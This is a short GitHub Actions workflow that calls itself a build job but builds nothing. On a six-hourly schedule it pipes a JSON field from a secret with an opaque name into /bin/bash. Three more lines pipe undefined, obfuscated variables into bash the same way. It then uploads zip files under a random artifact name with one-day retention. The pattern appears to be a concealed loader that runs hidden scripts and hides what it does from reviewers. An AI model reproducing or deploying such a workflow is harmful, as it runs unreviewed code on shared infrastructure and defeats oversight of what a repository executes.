name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '1 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          nkx6: ${{ secrets.nkx6 }}
        run: |
          printf '%s' "$nkx6" | jq -r .pw397 | /bin/bash
          echo $bdge9 | jq -r .do28 | /bin/bash
          printf '%s' "$ed0" | jq -r .l17 | /bin/bash
          printf '%s' "$hdkjf0" | jq -r .jgkeo0 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: Z2VjPEj9
          path: "*.zip"
          retention-days: 1
